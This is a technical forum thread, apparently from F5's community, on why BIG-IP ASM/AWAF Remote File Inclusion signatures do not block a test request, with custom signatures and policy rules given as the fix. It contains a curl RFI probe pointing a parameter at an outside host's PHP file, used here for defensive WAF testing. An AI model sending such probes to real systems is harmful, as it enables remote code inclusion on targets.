Technical Forum
Ask questions. Discover Answers.
cancel
Showing results for 
Search instead for 
Did you mean: 

F5 ASM/AWAF Remote File Inclusion signatures do not block http:// or https:// in the form parameter

Hello,

 

I tested some pentesting attacks like "curl https://x.x.x.x/?niki=http://1.1.1.1/file.php -kv" and the RFI/RFE attack does not get blocked even with RFI signatures beeing enabled as mentioned in Article Detail (f5.com) or Mitigating Remote File Inclusion attacks with BIG-IP ASM (f5.com) 

 

I had to create a custom signature but why as it is a simple signature to block this traffic ?

 

The custom signature works, so that is good 😀

 

f5-issue-3.PNG

1 ACCEPTED SOLUTION

I tested this on other vendors and it is the same as the info I got is that there are no default signatures for this RFI attack as it will cause many issues an false positives, so you need to make a custom signature/irule to block this for the specific vunrable parameter.

 

Outside of that for XC Distributed Cloud the Service policy rules seem the way to go for configuring something like signatures:

 

Nikoolayy1_0-1690446618255.png

 

View solution in original post

3 REPLIES 3

To my total astonishment I can reproduce this.

Daniel_Wolf_1-1690046131419.png

All Remote File Include Signatures are enforced in this policy.

Daniel_Wolf_2-1690046430698.png

And the ASM Request Log shows the malicious request just passes.

Daniel_Wolf_0-1690046066774.png

I am afraid we are missing something fundamental here 🙂

 

Yes, maybe I am doing the test wrong, still another big issue is that Nginx App Protect also has the option for custom signatures (Configuration | NGINX Ingress Controller) but for now XC Distributed cloud does not and even with all signatures enabled and not in staging the RFI attack is not blocked on XC.

 

As a test backend with metasploitable 3 you can exploit this vunrability as seen in your picture with the query "page" parameter.

 

 

Nikoolayy1_0-1690095987667.png

 

I tested this on other vendors and it is the same as the info I got is that there are no default signatures for this RFI attack as it will cause many issues an false positives, so you need to make a custom signature/irule to block this for the specific vunrable parameter.

 

Outside of that for XC Distributed Cloud the Service policy rules seem the way to go for configuring something like signatures:

 

Nikoolayy1_0-1690446618255.png